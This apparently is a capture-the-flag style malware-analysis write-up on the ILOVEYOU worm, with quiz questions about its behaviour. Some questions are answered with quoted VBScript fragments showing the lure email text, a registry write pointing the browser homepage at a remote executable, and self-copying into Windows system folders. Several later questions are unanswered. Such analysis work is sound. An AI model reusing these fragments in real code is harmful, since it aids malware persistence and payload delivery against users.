search

ILOVEYOU

What is the text present as part of email when the victim received this malware? (1 points)

male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from me."

What is the domain name that was added as the browser's homepage? (1 points)

If num = 1 Then
  regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~younHJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"

http://www.skyinet.net/

The malware replicated itself into 3 locations, what are they? (1 points)

rem Copy itself into VBScript files MSKernel32.vbs, Win32DLL.vbs and
rem LOVE-LETTER-FOR-YOU.TXT.vbs
c.Copy(dirsystem & "\MSKernel32.vbs")
c.Copy(dirwin & "\Win32DLL.vbs")
c.Copy(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")

C:\Windows\System32\MSKernel32.vbs, C:\Windows\System32\LOVE-LETTER-FOR-YOU.TXT.vbs, C:\Windows\Win32DLL.vbs

What is the name of the file that looks for the filesystem? (1 points)

rem Check if a file named "WinFAT32.exe" exists in the system files.
If (fileexist(dirsystem & "\WinFAT32.exe") = 1) Then
  Randomize

WinFAT32.exe

Which file extensions, beginning with m, does this virus target? (1 points)

What is the name of the file generated when the malware identifies any Internet Relay Chat service? (1 points)

What is the name of the password stealing trojan that is downloaded by the malware? (1 points)

What is the name of the email service that is targeted by the malware? (1 points)

What is the registry entry responsible for reading the contacts of the logged in email account? (1 points)

What is the value that is stored in the registry to remember that an email was already sent to a user? (1 points)

PreviousPhishing Analysis 2NextMeta

Last updated